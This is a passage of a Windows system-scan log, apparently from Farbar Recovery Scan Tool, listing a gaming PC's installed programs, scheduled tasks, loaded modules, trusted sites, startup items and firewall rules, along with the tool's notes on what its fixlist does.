The Witcher 3: Wild Hunt - New Quest - Fool's Gold (HKLM-x32\...\New Quest - Fool's Gold_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Scavenger Hunt - Wolf School Gear (HKLM-x32\...\New Quest - Scavenger Hunt: Wolf School Gear_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Where the Cat and Wolf Play... (HKLM-x32\...\New Quest - Where the Cat and Wolf Play..._is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Nilfgaardian Armor Set (HKLM-x32\...\Nilfgaardian Armor Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Skellige Armor Set (HKLM-x32\...\Skellige Armor Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Temerian Armor Set (HKLM-x32\...\Temerian Armor Set_is1) (Version: 1.0.0.0 - GOG.com)
Unity Web Player (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\UnityWebPlayer) (Version: 4.6.2f1 - Unity Technologies ApS)
Ventrilo Client for Windows x64 (HKLM\...\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}) (Version: 3.0.8.0 - Flagship Industries, Inc.)
Warframe (HKLM-x32\...\Steam App 230410) (Version:  - Digital Extremes)
WebM Project Directshow Filters (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\webmdshow) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-671774419-928818983-1318283798-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-671774419-928818983-1318283798-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll (Google Inc.)

==================== Restore Points =========================

25-09-2015 11:05:06 Windows Update
29-09-2015 07:29:18 Windows Update
02-10-2015 19:50:50 Windows Update
06-10-2015 15:23:47 Windows Update
09-10-2015 21:01:53 Windows Update
09-10-2015 21:30:37 Removed System Requirements Lab

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {057BC8EF-EAD1-4ECE-ABCF-C306DF8BB6C3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft)
Task: {396C368A-C84B-480B-8407-6A7744C239E5} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {410694CD-4DD8-4442-BBD3-AC8DFA3EF4DB} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-06-19] (Piriform Ltd)
Task: {4155E688-ABA9-4E6F-9440-4B6D5E668879} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {53C88EEA-2693-4DDB-B539-B99925E17745} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {9154CCC5-4C32-476D-BF34-E7E02A61A631} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {9F85C9F6-05BF-4FA5-B493-7CF2C2B1F9E1} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {C4DAB8E7-5E91-4533-8AC5-BEEDB86C31FC} - System32\Tasks\Shut Down => C:\Windows\System32\shutdown.exe [2009-07-13] (Microsoft Corporation)
Task: {C51C5FCF-CDC9-4CD0-8BB3-2F40904B2D90} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {D57B9FE0-A7E1-4275-9EAB-2A6DE5F26178} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {E75D205A-ED8C-4B42-8760-435A6B8DE2F9} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {EF43FFF9-815C-409C-877F-F24AEDDA2913} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core.job => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA.job => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

2015-01-05 01:28 - 2015-01-11 05:44 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2015-09-01 16:11 - 2015-08-25 09:24 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-08-26 18:34 - 2015-08-26 19:37 - 00011896 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2013-07-01 08:20 - 2015-10-05 11:18 - 00778752 _____ () E:\Steam\SDL2.dll
2015-01-19 16:12 - 2015-07-03 11:12 - 04962816 _____ () E:\Steam\v8.dll
2015-01-19 16:12 - 2015-07-03 11:12 - 01556992 _____ () E:\Steam\icui18n.dll
2015-01-19 16:12 - 2015-07-03 11:12 - 01187840 _____ () E:\Steam\icuuc.dll
2014-05-22 17:27 - 2015-10-08 18:02 - 02422864 _____ () E:\Steam\video.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 02549248 _____ () E:\Steam\libavcodec-56.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00442880 _____ () E:\Steam\libavutil-54.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00491008 _____ () E:\Steam\libavformat-56.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00332800 _____ () E:\Steam\libavresample-2.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00485888 _____ () E:\Steam\libswscale-3.dll
2013-07-09 17:56 - 2015-10-08 18:02 - 00704592 _____ () E:\Steam\bin\chromehtml.DLL
2015-07-21 21:46 - 2015-09-14 15:20 - 00193536 _____ () E:\Steam\bin\openvr_api.dll
2014-02-28 20:14 - 2014-02-28 20:14 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL
2015-01-13 18:00 - 2009-06-29 11:54 - 00164864 _____ () C:\Windows\SysWOW64\APOMngr.DLL
2015-08-28 18:11 - 2015-08-28 18:11 - 00091136 _____ () C:\Program Files (x86)\Corsair\Corsair Utility Engine\LuaQtWrapperLibrary.dll
2015-08-28 18:09 - 2015-08-28 18:09 - 00200704 _____ () C:\Program Files (x86)\Corsair\Corsair Utility Engine\lua52.dll
2015-08-28 18:09 - 2015-08-28 18:09 - 00224256 _____ () C:\Program Files (x86)\Corsair\Corsair Utility Engine\quazip.dll
2013-07-09 13:45 - 2015-10-08 17:20 - 45010208 _____ () E:\Steam\bin\libcef.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:233BFF24

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\.DEFAULT\...\freerealms.com -> freerealms.com
IE trusted site: HKU\.DEFAULT\...\soe.com -> soe.com
IE trusted site: HKU\.DEFAULT\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-19\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-19\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-19\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-19\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-20\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-20\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-20\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-20\...\sony.com -> sony.com


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-671774419-928818983-1318283798-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Rainsford\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: BEService => 3
MSCONFIG\Services: GalaxyClientService => 3
MSCONFIG\Services: GalaxyCommunication => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: amd_dc_opt => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe
MSCONFIG\startupreg: GalaxyClient => C:\Program Files (x86)\GalaxyClient\GalaxyClient.exe /launchViaAutoStart
MSCONFIG\startupreg: Google Update => "C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: LWS => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
MSCONFIG\startupreg: ShadowPlay => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{BFDBC452-B969-4474-A333-864300AF51E6}E:\cube world\server.exe] => (Allow) E:\cube world\server.exe
FirewallRules: [UDP Query User{71D40BAA-ACB7-4CFD-8B83-640390A5B8FE}E:\cube world\server.exe] => (Allow) E:\cube world\server.exe
FirewallRules: [{6E08BFCF-D9A7-48FD-A0A1-4DA4A3D61CAA}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{BAE38A45-33B9-49EC-ABCD-7C8BD33116C8}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{FAFAAACA-09E7-4AA1-8D94-BEFF7F05B3F5}] => (Allow) E:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{763CECB0-F12A-43B2-82B9-CBEC2B931E69}] => (Allow) E:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{2F8BB03A-2D21-4909-B373-D54990C91258}] => (Allow) E:\Steam\SteamApps\common\left 4 dead\left4dead.exe
FirewallRules: [{7273A4F6-80CE-4ADA-ACB2-B8161D00B4F9}] => (Allow) E:\Steam\SteamApps\common\left 4 dead\left4dead.exe
FirewallRules: [{DB3E95FA-8BD5-479A-B878-E1125C8E6194}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\DeviceSetup.exe
FirewallRules: [{C0536F30-A1C7-4C5F-B1BA-42347BE1D1FC}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\DeviceSetup.exe
FirewallRules: [{7022FB18-D86C-4BE8-B843-6A2EF10435B6}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{E9A820E9-CF01-4BAD-9077-7D7C986BD08D}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{94A87F83-10A0-4650-9BC9-63D0DEB6D3AB}] => (Allow) C:\Program Files\Ventrilo\Ventrilo.exe
FirewallRules: [{20B03EC3-DA0E-4DD7-8732-0CB60847BD19}] => (Allow) C:\Program Files\Ventrilo\Ventrilo.exe
FirewallRules: [{BD4D586F-4339-477C-AD9E-F4B48ADAB608}] => (Allow) E:\Steam\SteamApps\common\LEGO Lord of the Rings\LEGOLOTR.exe
FirewallRules: [{E9F1978E-0015-49D4-81B7-9BE5820F65E2}] => (Allow) E:\Steam\SteamApps\common\LEGO Lord of the Rings\LEGOLOTR.exe
FirewallRules: [{E1F0B437-8805-47E4-B6FA-B53AB3805F89}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{EACD5E72-705D-44F9-8169-CA3CB43E44C4}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{E7C39D57-6F65-46A3-994D-021745425E41}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{8BAF4C95-A503-46AB-B089-556690794ACE}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{B17C5800-3EB1-4359-8D99-113B4DEA316B}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{814FD1A3-4F3F-436B-8B6D-7BD93AAB1727}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{AAB7E1F9-B8FF-4F68-959E-B46E3C0A1D84}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{985BDA3A-5AF5-4243-9711-722A2FC665D5}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{895AA931-32C8-4759-AE60-1490487C5173}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{18CAED4C-9AF2-4C3A-BC32-EC6F3DAF1B14}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{0C4C7831-505E-4B39-9E1E-A210763384C6}] => (Allow) E:\Steam\SteamApps\common\Folk Tale\Folk Tale.exe
FirewallRules: [{BF867ACC-0403-417A-8117-B4A98C10AD05}] => (Allow) E:\Steam\SteamApps\common\Folk Tale\Folk Tale.exe
FirewallRules: [{0AFD057D-65F9-4698-8BBF-46F8005297A3}] => (Allow) E:\Steam\SteamApps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{801DC309-180C-4504-9C4D-8A8330ECE1A9}] => (Allow) E:\Steam\SteamApps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{626A4561-28CA-4B30-9A73-42EFE275A9E7}] => (Allow) E:\Steam\SteamApps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{360FF8FE-FB71-4744-BD87-C7053B61F1AC}] => (Allow) E:\Steam\SteamApps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{2604170D-E778-454D-8DB6-89F05846B7CC}] => (Allow) C:\Users\Rainsford\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{2B44E01E-31BF-434D-8465-DA8D4147C906}] => (Allow) C:\Users\Rainsford\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{2FFA375C-2B41-4F04-A8DA-F082F100817E}] => (Allow) E:\Steam\SteamApps\common\Resident Evil 4\Bin32\bio4.exe
FirewallRules: [{1F239078-9A44-47FF-BF54-6A177C0B43FF}] => (Allow) E:\Steam\SteamApps\common\Resident Evil 4\Bin32\bio4.exe
FirewallRules: [{E5E4AE47-31B4-4448-886A-BA5FEBBAF644}] => (Allow) E:\Steam\bin\steamwebhelper.exe
FirewallRules: [{5AD08DF9-1F92-415E-A840-492AB893AEB3}] => (Allow) E:\Steam\bin\steamwebhelper.exe
FirewallRules: [{5DAA2937-A6E2-47BA-AEA9-43944056D8FF}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [{88A55836-2520-40BE-B577-F5F42CBA96DF}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [TCP Query User{2AFBD48F-3845-484A-9B2E-906858651FAC}D:\steam\steamapps\common\war thunder\aces.exe] => (Allow) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{6A13CFCD-796A-474F-B514-74E18BF35BD2}D:\steam\steamapps\common\war thunder\aces.exe] => (Allow) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [{491F1CDB-0E77-4D4B-945C-2C9564D2985E}] => (Block) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [{26A05D2E-E639-48AC-B07F-BFA2199E84E8}] => (Block) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [{EDCCE3D2-4BF2-4239-B562-A97F96D7C54B}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{F374D182-E5EF-4DB6-8BD9-F265F3BA10E9}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{005355AF-03FC-47A5-ADEB-6A580F91AFEE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{C30D9B16-4D4B-45EE-9869-5E404A10AD1B}C:\program files (x86)\lolreplay\lolreplay.exe] => (Allow) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [UDP Query User{00E67094-1EF4-47BA-8B9F-8FFE0A2CB51C}C:\program files (x86)\lolreplay\lolreplay.exe] => (Allow) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [{F73283FA-8F4B-40B9-B081-C1836B4F226D}] => (Block) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [{5F25B14A-B5F6-4555-9947-8B70C06F5163}] => (Block) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [{A3C7379B-3DA6-40A9-AA6A-3460A3F187CF}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{A6E6C99C-C644-437F-97B1-F8CB79A76DB3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{96BFB049-46CB-467E-9113-D38FD6E34774}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{F844AA44-407C-4EF1-9F94-760C27B24D4F}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{C66A5953-9B0E-482B-A60B-5F30215E132E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{F868B400-0AB7-46D1-BBEA-F5597B27A416}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1E4DEC2B-20E3-4904-8E20-28F5D9AEFBCC}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{D61F4363-E1C8-4426-BCE6-0290FD081469}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{B460A1FB-C72C-415A-B913-EEEB540D312B}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{A3338958-A22C-4216-9F3E-9863A57D5A91}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{589B4BAA-86FE-4EFC-A245-3C7B65EAF5E8}] => (Allow) E:\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{57180CCE-D3FB-4C09-AC3C-69FB5E2913EB}] => (Allow) E:\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{EF176EB4-92AB-4E03-A64A-731419CBF641}] => (Allow) E:\Steam\SteamApps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [{83E45121-4288-49B0-BB42-BD28B5C23512}] => (Allow) E:\Steam\SteamApps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [TCP Query User{F37557B9-4C6F-4D2C-8307-FBF62319DF56}E:\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) E:\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{969B3398-D375-4E58-B2E0-9F649E6F1017}E:\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) E:\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [{70D192B7-3C62-44D6-B155-36B9F79128FB}] => (Allow) C:\Program Files (x86)\Origin\Games\Plants vs Zombies Garden Warfare\PVZ.Main_Win64_Retail.exe
FirewallRules: [{A7190AC9-D0AD-411F-9F1E-011928B5DAB0}] => (Allow) C:\Program Files (x86)\Origin\Games\Plants vs Zombies Garden Warfare\PVZ.Main_Win64_Retail.exe
FirewallRules: [{A2AEB4F3-A587-4D58-B6D9-44924F105255}] => (Allow) E:\Steam\SteamApps\common\Dark Souls II\Game\DarkSoulsII.exe
FirewallRules: [{574445D7-8613-47DD-9671-90E1AEC69AD2}] => (Allow) E:\Steam\SteamApps\common\Dark Souls II\Game\DarkSoulsII.exe
FirewallRules: [TCP Query User{5D71F6FD-380A-4EBC-9BD1-5AB8E8785009}C:\program files\java\jre1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_45\bin\java.exe
FirewallRules: [UDP Query User{0AB1ECAC-A617-4470-90F9-34FD577A4E68}C:\program files\java\jre1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_45\bin\java.exe
FirewallRules: [{C57453AB-9669-4FB7-9F17-4E97D442C398}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{8506C8AF-1E70-40D1-8BC9-7A91B915B89A}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{F4F266A7-BA95-40EB-A9CC-7F6903C1E6C9}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{EF4F0D30-4E79-452E-89B6-5AF34D47E8BA}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{D8758C27-76ED-4F3A-8D91-5FCBD28BB0A8}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{00803F2A-A997-44F4-802B-F19DA1FBA857}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{83883E09-53A0-4743-BDEB-1FE97BC82FBC}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{A6C0A8BD-9B28-409A-B0F6-4AC1D430ED04}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{AE8BA216-910F-4E1A-AE9C-AD0148D23351}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{46AA55A3-0A8E-4791-A1AA-ED3FB28F8901}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{EE83B4FE-F8EA-48EB-8854-7DADFADC7071}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{EF774EF4-AE62-452D-AABB-742510CB8D97}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{4B19D8CC-4E53-4DB5-AFA7-685BA9254663}] => (Allow) E:\Steam\SteamApps\common\Creeper World 3\CW3.exe
FirewallRules: [{A2C44820-72DC-4389-8F20-9ED0AA20285A}] => (Allow) E:\Steam\SteamApps\common\Creeper World 3\CW3.exe
FirewallRules: [{90ADC940-E26E-4CE3-B67A-7A8EC41273B5}] => (Allow) E:\Steam\SteamApps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{C19CB68B-DD64-48E4-8390-D4A90B3F0EB4}] => (Allow) E:\Steam\SteamApps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{2D08790A-55E9-47AF-9060-1EA2CEA0C77D}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\ed6_win.exe
FirewallRules: [{435FDB8B-F1AB-47FE-9BDE-232AC555244F}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\ed6_win.exe
FirewallRules: [{4C8795B8-BA31-4E80-8B8F-E7E909C6875E}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\Config.exe
FirewallRules: [{F33856D3-7947-462C-BC6D-C44C59EB7839}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\Config.exe
FirewallRules: [{F2B9D881-3C69-4A54-958E-E125223A409E}] => (Allow) D:\Steam\SteamApps\common\Starpoint Gemini 2\StarpointGemini2.exe
FirewallRules: [{B9154475-5134-48B8-BE98-5E9292A2EA1F}] => (Allow) D:\Steam\SteamApps\common\Starpoint Gemini 2\StarpointGemini2.exe
FirewallRules: [{A92600EC-D78E-42BA-8D94-36990C1D919F}] => (Allow) D:\Steam\SteamApps\common\Hardland\Hardland.exe
FirewallRules: [{3A9F4FCD-2165-40A1-84A6-76AADD75DE06}] => (Allow) D:\Steam\SteamApps\common\Hardland\Hardland.exe
FirewallRules: [TCP Query User{0D1DA35C-0B9D-44ED-B196-11C01BD439E4}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{1E1477F8-AA0E-45D6-8865-AE3ACAC4C065}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [{6830A96F-7D88-49D3-82E1-D42570AC6A57}] => (Allow) D:\Steam\SteamApps\common\Resident Evil 5\Launcher.exe
FirewallRules: [{576FB9D6-608C-4E98-8E65-CC8AF1A1A32A}] => (Allow) D:\Steam\SteamApps\common\Resident Evil 5\Launcher.exe
FirewallRules: [TCP Query User{6F305C4B-A619-4C14-8E45-8414C50C3940}D:\steam\steamapps\common\resident evil 5\re5dx9.exe] => (Allow) D:\steam\steamapps\common\resident evil 5\re5dx9.exe
FirewallRules: [UDP Query User{C254B5EF-CFB3-4883-B449-DB62D605DC46}D:\steam\steamapps\common\resident evil 5\re5dx9.exe] => (Allow) D:\steam\steamapps\common\resident evil 5\re5dx9.exe
FirewallRules: [TCP Query User{2271D2CA-B2AD-44BF-A9F6-E60C263B15F8}C:\program files (x86)\cabal2 (us)\c2launcher.exe] => (Allow) C:\program files (x86)\cabal2 (us)\c2launcher.exe
FirewallRules: [UDP Query User{D09F2206-6AE2-45A5-AEEA-EF284C3260A9}C:\program files (x86)\cabal2 (us)\c2launcher.exe] => (Allow) C:\program files (x86)\cabal2 (us)\c2launcher.exe
FirewallRules: [{7BD94C4A-A39A-4F52-9B68-35FAD1690595}] => (Allow) E:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{801D2BCC-A17C-49AB-A43D-24821A321037}] => (Allow) E:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{E7175DCF-BA58-4262-9DFD-6C28E534D452}] => (Allow) E:\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{4649A39A-750D-4FE4-8C14-0609D7CF5F16}] => (Allow) E:\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{C51D2E94-87FF-492A-AAB5-5B666238066A}] => (Allow) C:\Users\Rainsford\AppData\Local\MyComGames\MyComGames.exe
